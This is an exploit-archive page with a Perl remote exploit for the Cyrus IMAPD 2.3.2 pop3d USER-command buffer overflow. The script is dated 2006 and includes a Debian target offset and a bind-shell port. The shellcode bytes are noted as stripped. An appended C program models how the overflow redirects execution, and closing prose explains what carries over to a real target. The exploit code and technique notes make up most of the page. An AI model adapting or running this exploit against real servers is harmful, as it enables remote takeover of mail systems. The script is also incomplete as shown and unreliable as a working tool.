
Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)

Category: remote exploits

## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
##  exploits and neither of them worked (not that they don't, but coding my own is generally faster
##  and easier) so I coded my own. The exploit by kcope seems to be done right and maybe I just got really
##  unlucky and missed the offset in the 5 runs I gave it. The one from bannedit was interesting...
##  really nice idea about overwriting the pointer and sticking your shellcode in the GOT. The only problem is that
##  when I was writing this exploit with the same method, and I placed my shellcode in the GOT, functions before
##  the return from the vuln function were segfaulting first by trying to actually *use* the GOT! So what I have
##  done here is use the same method, yet found a data area that is not going to freak pop3d
##  out before it gets to the return. Specifically I use part of the .data segment (or was it .bss, anyway) labeled
##  'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
## Other: Basically what all this means is you just have to give an offset that is a location in memory that
##  is writeable and executable (anything in .data, .bss, .stack, .heap, etc.) and make sure it's not something
##  that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
##  shellcode (because it'll segfault and won't get executed).
## Note: bindport is 13370
use IO::Socket;
use strict;
use warnings;

my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stolen from cyruspop3d.c because this actually worked, I couldn't get any
# metasploit sc to work (as usual, hmph)
my $shellcode = "";   # NOTE: the shellcode bytes are missing from this listing (stripped); the cyruspop3d.c payload goes here

my $sock = IO::Socket::INET->new('PeerAddr' => $host,
                                 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");


print $sock "USER ";                       ## begin USER command with just that
print $sock "$shellcode";                  ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n";                          ## that simple

sub help {
	print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
	print "08/12/2006\n\n";
	print "perl $0 \$host \$offset\n\n";
	print "Offsets: \n";
	print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";
	exit(1);   # the original listing is cut off here; the sub is closed so the script runs
}


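The "Other" note in the header describes the whole trick: the offset, repeated over and over, overwrites both the saved return address and the pointer the function later writes the user name through, so the USER argument (shellcode first) gets copied to that address and the function then returns into it. The C program below is an added example that models that data flow; it is not part of K-sPecial's exploit and not Cyrus code. It uses an explicit struct as a stand-in for the vulnerable stack frame and a global array as a stand-in for the pop3d 'buf' area in .data; the slot names and sizes, the NOP padding, the repeat count and the marker bytes used in place of shellcode are all constructed for the example, and nothing is executed from the buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the exploit's data flow (not Cyrus code):
 * data_buf stands in for the writable area in pop3d's .data that the
 * listing calls 'buf'; struct frame stands in for the vulnerable stack
 * frame, with the fixed-size user buffer followed by the output pointer
 * and the saved return address.  The layout is made explicit so the
 * overflow is well-defined C rather than a real stack smash. */
#define USERBUF_SIZE 64
#define REPEAT       30

static unsigned char data_buf[256];

struct frame {
    unsigned char  userbuf[USERBUF_SIZE];   /* USER argument is copied here unchecked */
    unsigned char *out;                     /* where the function later writes the user name */
    void          *saved_eip;               /* where the function returns */
};

/* Build the wire payload the way the Perl script does: shellcode first,
 * then one address repeated so the same word lands in every slot above
 * the buffer.  The shellcode is padded to a pointer-size boundary so the
 * repeated word stays aligned with those slots.  Returns the payload
 * length, or 0 if the shellcode alone does not fit. */
size_t build_payload(unsigned char *dst, size_t cap,
                     const unsigned char *sc, size_t sclen, uintptr_t addr)
{
    const size_t word = sizeof addr;
    size_t n;

    if (sclen > cap)
        return 0;
    memcpy(dst, sc, sclen);
    n = sclen;
    while (n % word != 0 && n < cap)
        dst[n++] = 0x90;                    /* NOP padding (x86 convention) */
    for (int i = 0; i < REPEAT && n + word <= cap; i++) {
        memcpy(dst + n, &addr, word);       /* native byte order, like pack('l') */
        n += word;
    }
    return n;
}

/* Models the vulnerable function: an unbounded copy of the USER argument
 * spills past userbuf into out and saved_eip; the function then writes the
 * received name through *out (now the attacker's address) and returns.
 * Returns the address it would return to. */
void *vulnerable_frame(const unsigned char *payload, size_t len)
{
    struct frame f;

    memset(&f, 0, sizeof f);
    f.out = data_buf;                       /* the legitimate output buffer */
    f.saved_eip = NULL;                     /* stand-in for the real return address */

    /* The bug: no bound on the copy, so everything after userbuf is overwritten. */
    memcpy(&f, payload, len < sizeof f ? len : sizeof f);

    /* Normal post-processing copies the name through the pointer; after the
     * overflow that pointer holds the repeated address, so the bytes at the
     * start of userbuf (the shellcode) are written to that address. */
    memcpy(f.out, f.userbuf, USERBUF_SIZE);

    return f.saved_eip;
}

/* Returns 1 when one repeated address has taken over both slots: the bytes
 * sent first now sit at data_buf and the return slot points at data_buf. */
int run_demo(void)
{
    static const unsigned char marker[] = "SHELLCODEMARK"; /* constructed 13-byte stand-in, not real code */
    const size_t mlen = sizeof marker - 1;
    unsigned char payload[512];
    size_t n = build_payload(payload, sizeof payload, marker, mlen, (uintptr_t)data_buf);
    void *ret;

    if (n == 0)
        return 0;
    ret = vulnerable_frame(payload, n);
    return ret == (void *)data_buf && memcmp(data_buf, marker, mlen) == 0;
}

int main(void)
{
    printf("payload landed in buf and return slot points at it: %s\n",
           run_demo() ? "yes" : "no");
    return 0;
}
```

Two details carry over to a real target. First, the repeated word only fills both slots cleanly when the bytes in front of it end on a pointer-size boundary, which the model handles with padding and which the script above gets from the length of its shellcode. Second, the address has to be a region nothing touches between the overflow and the return, which is exactly why the listing moves the target from the GOT to 'buf'.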
#  0day.today [2024-07-16]  #